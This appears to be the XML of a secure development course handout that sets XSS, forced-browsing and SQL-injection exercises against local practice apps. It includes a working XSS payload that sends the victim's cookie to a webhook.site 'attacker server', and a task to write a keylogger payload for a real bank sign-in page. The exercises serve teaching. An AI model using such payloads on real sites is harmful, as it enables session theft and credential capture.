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A0992A8" w14:textId="6C6329A1" w:rsidR="0007439E" w:rsidRDefault="00D57631" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SDL Course </w:t>
      </w:r>
      <w:r w:rsidR="00C22657">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exercises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D3BCB" w14:textId="299BD482" w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00C3366C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A343925" w14:textId="319D8F9A" w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00FC055F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049AC91C" w14:textId="4121F98F" w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00C3366C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB2D002" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00C22657" w:rsidP="00C3366C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simplexssfiltering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6FBA3D" w14:textId="5D7CBF18" w:rsidR="00C22657" w:rsidRDefault="00FC055F" w:rsidP="00FC055F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F</w:t>
      </w:r>
      <w:r w:rsidR="00C22657">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ind a payload to bypass filtering and get XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1656B4A8" w14:textId="135D0051" w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00FC055F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Fix the filter to prevent the bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1DA45" w14:textId="00F65F2C" w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00FC055F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Try to bypass your fix. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ADD6C8" w14:textId="7E64367D" w:rsidR="00C22657" w:rsidRDefault="00C22657" w:rsidP="00C3366C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Do the same for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplexss</w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Look for evasions on the web, for example: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C22657">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DE057B" w14:textId="4FE40429" w:rsidR="00C22657" w:rsidRDefault="00D57631" w:rsidP="00C3366C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Develop a useful XSS payload that sends the victim cookie to the attacker server. For example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798078BA" w14:textId="1ABE42BC" w:rsidR="00D57631" w:rsidRDefault="00D57631" w:rsidP="00C3366C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In </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="004861D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://webhook.site/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, copy the URL </w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="004861D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Th</w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the attacker server </w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">URL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">where you can see the victim request with </w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the stolen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F563755" w14:textId="3DE0369C" w:rsidR="00D57631" w:rsidRDefault="00D57631" w:rsidP="00C3366C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In simplexss.py, the following payload will send the victim’s cookie to the webhook site (replace the URL with the URL you copied in step </w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE77371" w14:textId="09857798" w:rsidR="00D57631" w:rsidRDefault="004F208A" w:rsidP="00C3366C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00D57631" w:rsidRPr="004861D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://localhost:5000/%3Cscript%3Ewindow.open(%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.cookie)%3C/script%3E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F2764C6" w14:textId="40A2762F" w:rsidR="00D57631" w:rsidRDefault="00D57631" w:rsidP="00C3366C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In </w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.b, is the URL encoding necessary?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1E67A" w14:textId="5314B809" w:rsidR="001F7BD9" w:rsidRDefault="001F7BD9" w:rsidP="001F7BD9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Try the payload in 3.b in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplestoredxss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Why doesn’t it work? Can you find a payload that works?</w:t>
      </w:r>
      <w:r w:rsidR="00D865D9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can use curl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BC7AC3" w14:textId="6AB31C8D" w:rsidR="00D57631" w:rsidRDefault="00D57631" w:rsidP="00C3366C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A keylogger is malware that records victims’ keystrokes to steal passwords and secrets that they type. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED0D91" w14:textId="569CBDB2" w:rsidR="00B17BAF" w:rsidRPr="00FC055F" w:rsidRDefault="00D57631" w:rsidP="00FC055F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You have XSS on </w:t>
      </w:r>
      <w:r w:rsidR="00C3366C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bank of America</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B17BAF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sign-in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> page. Use the dev console to write XSS payload that implements keylogger</w:t>
      </w:r>
      <w:r w:rsidR="00B17BAF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to steal the passcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FC055F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00FC055F" w:rsidRPr="004861D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.bankofamerica.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6250A5D2" w14:textId="03CB5CB0" w:rsidR="00FC055F" w:rsidRDefault="00B17BAF" w:rsidP="00057F5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B17BAF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3480C8F8" wp14:editId="77B03D89">
            <wp:extent cx="5943600" cy="858520"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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1261" w14:textId="379A4D94" w:rsidR="00FC055F" w:rsidRDefault="00FC055F" w:rsidP="00FC055F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>In simplexss.py, set response content type to “application/json. Can you find a payload to get XSS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52B7DC" w14:textId="41D1163A" w:rsidR="00FC055F" w:rsidRDefault="00FC055F" w:rsidP="009761EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="aut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Set the cookie http-only flag. Do XSS to steal the cookie. Can you steal it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6607E1BB" w14:textId="77777777" w:rsidR="00057F5C" w:rsidRDefault="00057F5C" w:rsidP="009761EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4E94FA" w14:textId="576BC2E9" w:rsidR="009761EC" w:rsidRDefault="009761EC" w:rsidP="009761EC">
      <w:pPr>
        <w:pStyle w:val="Heading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Forced Browsing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2147C6" w14:textId="77777777" w:rsidR="00057F5C" w:rsidRPr="00057F5C" w:rsidRDefault="00057F5C" w:rsidP="00057F5C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E006F8A" w14:textId="5061BE32" w:rsidR="009761EC" w:rsidRDefault="006C7FBE" w:rsidP="006C7FBE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7FBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In loginforcedbrowsingbug.py, the user is authenticated, but there is still forced browsing. What is the bug in the logic of the program? Can you fix it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CA55AF" w14:textId="697F0CD4" w:rsidR="006C7FBE" w:rsidRDefault="006C7FBE" w:rsidP="006C7FBE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C1DB2" w14:textId="33AC1918" w:rsidR="006C7FBE" w:rsidRDefault="006C7FBE" w:rsidP="006C7FBE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4B88FB" w14:textId="0CDC3086" w:rsidR="006C7FBE" w:rsidRDefault="008C01C3" w:rsidP="006C7F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simplesqli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, find SQLI payload to attack the /users/create/&lt;user&gt; endpoint INSERT query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E3C33" w14:textId="615AA966" w:rsidR="008065E3" w:rsidRPr="006C7FBE" w:rsidRDefault="008065E3" w:rsidP="006C7F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nd blind SQLI to get the cookies of other users from DB. Assume you know the user names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF804F" w14:textId="77777777" w:rsidR="006C7FBE" w:rsidRPr="009761EC" w:rsidRDefault="006C7FBE" w:rsidP="009761EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006C7FBE" w:rsidRPr="009761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6C400" w14:textId="77777777" w:rsidR="004F208A" w:rsidRDefault="004F208A" w:rsidP="00FC055F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B85A7B6" w14:textId="77777777" w:rsidR="004F208A" w:rsidRDefault="004F208A" w:rsidP="00FC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2636" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00FC0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1C87" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00FC0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F6EDB" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00FC0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6FF56" w14:textId="77777777" w:rsidR="004F208A" w:rsidRDefault="004F208A" w:rsidP="00FC055F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F14BC9B" w14:textId="77777777" w:rsidR="004F208A" w:rsidRDefault="004F208A" w:rsidP="00FC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CD51" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00FC0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63A9C" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00FC0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F1E6" w14:textId="77777777" w:rsidR="00FC055F" w:rsidRDefault="00FC0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303"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51A47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4F30AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53542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C6424"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51A47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6E7D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDB0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61FEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD28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223EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7D8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B50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CC8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57"/>
    <w:rsid w:val="00057F5C"/>
    <w:rsid w:val="001F7BD9"/>
    <w:rsid w:val="0032231A"/>
    <w:rsid w:val="004F208A"/>
    <w:rsid w:val="005A6A43"/>
    <w:rsid w:val="006C7FBE"/>
    <w:rsid w:val="008065E3"/>
    <w:rsid w:val="008C01C3"/>
    <w:rsid w:val="009761EC"/>
    <w:rsid w:val="009A4684"/>
    <w:rsid w:val="009E702A"/>
    <w:rsid w:val="00AA6B04"/>
    <w:rsid w:val="00B17BAF"/>
    <w:rsid w:val="00C22657"/>
    <w:rsid w:val="00C3366C"/>
    <w:rsid w:val="00D57631"/>
    <w:rsid w:val="00D865D9"/>
    <w:rsid w:val="00FC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196B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DB5C5F54-AB75-414B-8BE3-487EA969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5F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055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55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55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5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5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55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55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55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55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657"/>
    <w:rPr>
      <w:color w:val="77A2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6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055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C0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55F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC0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55F"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FC0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55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55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055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055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55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55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C055F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055F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C055F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FC055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C055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55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55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FC055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C055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C055F"/>
    <w:rPr>
      <w:smallCaps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="00FC055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55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C055F"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FC055F"/>
    <w:rPr>
      <w:color w:val="957A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hook.sit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ofameric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5000/%3Cscript%3Ewindow.open(%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.cookie)%3C/script%3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hook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c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D2CE2-C189-4346-8ABB-A097E42C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, Tal (GE Digital)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Manor, Tal (GE Digital)</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-25T08:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-25T11:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>